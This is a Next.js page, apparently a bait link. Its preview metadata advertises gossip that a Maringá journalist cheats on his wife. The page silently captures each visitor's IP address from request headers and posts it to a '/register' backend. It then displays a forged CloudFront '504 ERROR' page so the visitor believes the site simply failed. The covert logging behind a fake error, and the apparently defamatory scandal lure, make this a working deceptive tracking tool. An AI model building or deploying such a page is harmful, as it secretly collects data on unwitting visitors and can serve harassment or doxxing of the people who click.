import Head from "next/head";
import axios from "axios";
import { useCallback, useEffect, useMemo } from "react";

import img from "../public/jornalismo.jpeg";
import api from "./api";

export default function Home({ ip }) {
  useMemo(() => api.get("/"), []);

  const handleSubmit = useCallback(async () => {
    try {
      console.log("AQUI");
      await new Promise((resolve) => setTimeout(resolve, 250));
      const response = await api.post("/register", { ipAddress: ip });
      console.log(response);
    } catch (error) {
      console.log(error);
    }
  }, [ip]);

  useEffect(() => {
    api
      .get("/")
      .then((response) => handleSubmit())
      .catch((error) => handleSubmit());
  }, [handleSubmit]);

  const currentURL = "http://fofocando.vercel.com.br";
  const previewImage =
    "https://www.tupi.fm/wp-content/uploads/2019/08/repórter-300x140.png";
  const siteName = "Fofocando Maringá";
  const pageTitle = "Bomba Jornalista de Maringá trai esposa";
  const description =
    "Um jornalista de Maringá está enfrentando uma situação complicada em sua vida conjugal....";

  return (
    <div>
      <Head>
        <title>Create Next App</title>
        <link rel="icon" href="/favicon.ico" />
        <meta property="og:url" content={currentURL} key="ogurl" />
        <meta property="og:image" content={previewImage} key="ogimage" />
        <meta property="og:site_name" content={siteName} key="ogsitename" />
        <meta property="og:title" content={pageTitle} key="ogtitle" />
        <meta property="og:description" content={description} key="ogdesc" />
      </Head>

      <main>
        <h1>504 ERROR</h1>
        <h2>The request could not be satisfied.</h2>
        <hr />
        CloudFront attempted to establish a connection with the origin, but
        either the attempt failed or the origin c losed the connection. We can t
        connect to the server for this app or website at this time. There might
        be too much traffic or a con figuration error. Try again later, or
        contact the app or website owner.
        <br />
        If you provide content to customers through CloudFront, you can find
        steps to troubleshoot and help prevent t his error by reviewing the
        CloudFront documentation.
        <br />
        <hr />
        <pre>
          Generated by cloudfront (CloudFront) Request ID:
          mOWF1EirGoYtvHZecl30gRxV8BH795HPffePtmHnRZNMIupEorzMJw==
        </pre>
        <address></address>
      </main>
    </div>
  );
}

Home.getInitialProps = async ({ req }) => {
  const ip = req.headers["x-real-ip"] || req.connection.remoteAddress;
  return { ip };
};
